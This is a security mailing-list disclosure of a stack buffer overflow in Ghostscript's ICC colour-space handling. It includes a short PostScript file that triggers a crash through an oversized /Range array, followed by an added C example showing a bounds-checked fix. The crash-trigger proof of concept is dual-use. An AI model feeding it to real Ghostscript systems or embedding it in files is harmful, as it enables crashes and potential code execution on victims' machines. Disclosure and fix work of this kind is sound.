Ghostscript buffer overflow
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Ghostscript buffer overflow
- From: "Chris Evans" <scarybeasts@xxxxxxxxx>
- Date: Thu, 28 Feb 2008 14:57:42 -0800
Hi,
Buffer overflow in Ghostscript. A useful attack vector because a lot
of UNIX workstations will put PS files on the web through Ghostscript.
The problem is a stack-based buffer overflow in the zseticcspace()
function in zicc.c. The issue is over-trust of the length of a
PostScript array which an attacker can set to an arbitrary length. One
slight amusement is that the overflowed type is "float", leading to
machine code -> float conversion in any exploit. An example .ps file
to trigger a crash follows:
%!PS-Adobe-2.0
<< /DataSource currentfile /N 100 /Range [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 ] >> .seticcspace
Announcement:
http://scarybeastsecurity.blogspot.com/2008/02/buffer-overflow-in-ghostscript.html
Full technical details including a demo exploit by my colleague Will Drewry:
http://scary.beasts.org/security/CESA-2008-001.html
Cheers
Chris
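The defect described above is an unchecked copy of a caller-controlled PostScript array into a fixed-size float array on the stack. The following C model, added here as an illustration and not taken from the post or from Ghostscript's zicc.c, shows the shape of the fix: validate /N and the /Range array length against the buffer's capacity before writing a single element. The buffer capacity (4 components, 8 floats), the struct, and the function names are assumptions made for the example; the oversized input mirrors the crash file's /N 100 and long /Range array but is constructed here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed capacity of the fixed stack buffer that /Range is copied into
 * (a (min,max) pair per colour component).  Not Ghostscript's real layout. */
#define MAX_COMPONENTS 4
#define RANGE_CAPACITY (2 * MAX_COMPONENTS)

enum { ICC_OK = 0, ICC_RANGECHECK = -1 };

/* Hypothetical stand-in for the parsed ICC colour-space dictionary:
 * the integer /N and the /Range array whose length the caller controls. */
struct icc_dict {
    int n_components;      /* /N */
    const float *range;    /* /Range array elements */
    size_t range_len;      /* number of elements actually in /Range */
};

/* Hardened copy: every bound is checked before memcpy, so an oversized
 * array is rejected with ICC_RANGECHECK and range_buff is never overrun. */
int copy_icc_range(const struct icc_dict *d, float range_buff[RANGE_CAPACITY])
{
    if (d->n_components < 1 || d->n_components > MAX_COMPONENTS)
        return ICC_RANGECHECK;
    /* /Range must hold exactly one (min,max) pair per component. */
    if (d->range_len != (size_t)(2 * d->n_components))
        return ICC_RANGECHECK;
    /* Implied by the two checks above, but stated against the buffer itself
     * so the guard survives if MAX_COMPONENTS or the pairing rule changes. */
    if (d->range_len > RANGE_CAPACITY)
        return ICC_RANGECHECK;
    memcpy(range_buff, d->range, d->range_len * sizeof(float));
    for (size_t i = d->range_len; i < RANGE_CAPACITY; i++)
        range_buff[i] = 0.0f;    /* deterministic contents for unused slots */
    return ICC_OK;
}

/* Constructed input in the spirit of the crash file: /N 100 with a
 * 200-element /Range array, far beyond the 8-float buffer. */
static float big_range[200];

int demo_oversized(void)
{
    float buff[RANGE_CAPACITY];
    struct icc_dict d = { 100, big_range, 200 };
    return copy_icc_range(&d, buff);
}

/* Constructed legitimate input: a 3-component space with six range values. */
static const float rgb_range[6] = { 0.f, 1.f, 0.f, 1.f, 0.f, 1.f };

int demo_valid(void)
{
    float buff[RANGE_CAPACITY];
    struct icc_dict d = { 3, rgb_range, 6 };
    return copy_icc_range(&d, buff);
}

/* Returns 1 when the valid input is accepted and copied element-for-element,
 * with the two unused slots zeroed; 0 otherwise. */
int demo_valid_copied_correctly(void)
{
    float buff[RANGE_CAPACITY];
    struct icc_dict d = { 3, rgb_range, 6 };
    if (copy_icc_range(&d, buff) != ICC_OK)
        return 0;
    for (size_t i = 0; i < 6; i++)
        if (buff[i] != rgb_range[i])
            return 0;
    return buff[6] == 0.0f && buff[7] == 0.0f;
}

int main(void)
{
    printf("oversized /Range: %s\n",
           demo_oversized() == ICC_OK ? "accepted" : "rejected");
    printf("valid /Range:     %s\n",
           demo_valid() == ICC_OK ? "accepted" : "rejected");
    return 0;
}
```

The point of checking /N and the array length separately is that the two are independent attacker-controlled values: a consistent-looking pair (say /N 100 with 200 entries) still has to be measured against the real capacity of the destination, not merely against each other.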